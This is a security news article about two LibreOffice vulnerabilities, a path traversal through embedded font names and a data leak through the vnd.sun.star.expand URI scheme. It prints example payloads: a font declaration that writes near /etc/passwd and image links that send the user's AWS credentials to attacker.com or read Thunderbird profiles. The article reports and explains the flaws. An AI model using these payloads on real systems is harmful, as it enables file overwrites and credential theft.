LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

Two critical vulnerabilities in LibreOffice (CVE-2024-12425 and CVE-2024-12426) expose millions of users to file system manipulation and sensitive data extraction attacks.

These flaws affect both desktop users opening malicious documents and server-side systems using LibreOffice for headless document processing.

CVE-2024-12425: Path Traversal Enables Arbitrary File Writes

The first vulnerability stems from improper path sanitization when handling embedded fonts in OpenDocument XML files.

Attackers can craft documents containing malicious font declarations that escape LibreOffice’s temporary directory through path traversal sequences, as CodeanLabs reports.

The critical code flaw resides in EmbeddedFontsHelper::fileUrlForTemporaryFont, where user-controlled fontName values aren’t sanitized before constructing file paths:

OUString EmbeddedFontsHelper::fileUrlForTemporaryFont(const OUString& fontName) {

// ...
    path += "/user/temp/embeddedfonts/fromdocs/";
    return path + filename; // FontName contains unsanitized input
}

An attacker could exploit this by embedding a font declaration containing directory traversal sequences:

<style:font-face svg:font-family="../../../../../../../etc/passwd">
  <office:binaryData>SGVsbG8gd29ybGQ...</office:binaryData>
</style:font-face>

This writes the decoded binary data to /etc/passwd0.ttf despite the .ttf extension limitation. 

Server-side installations are particularly vulnerable as attackers could overwrite web application files or configuration scripts.

CVE-2024-12426: Variable Expansion Enables Data Exfiltration

The second vulnerability involves LibreOffice’s handling of the vnd.sun.star.expand URI scheme, which supports environment variable substitution and INI file parsing. Attackers can craft documents that leak sensitive information through manipulated URLs:

<img src="vnd.sun.star.expand:http://attacker.com?leak=$HOME/.aws/credentials">

The expansion mechanism supports recursive lookups, enabling complex data extraction chains:

<img src="vnd.sun.star.expand:${file://$HOME/.thunderbird/profiles.ini:Profile0:Path}/...">

This allows reading Thunderbird profiles, SQLite databases, and application secrets stored in environment variables. In one demonstrated attack, hackers could intercept WordPress password reset tokens from email clients by combining multiple expansion steps.

LibreOffice released patches addressing these vulnerabilities in versions:

• 7.5.9 (Community)
• 7.6.5 (Community)
• 24.2.2 (Enterprise)

These vulnerabilities highlight the risks of complex document processing ecosystems, particularly when combining user-controlled content with legacy file format support.

Enterprises must maintain rigorous patch management cycles for office software components, even in server environments.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free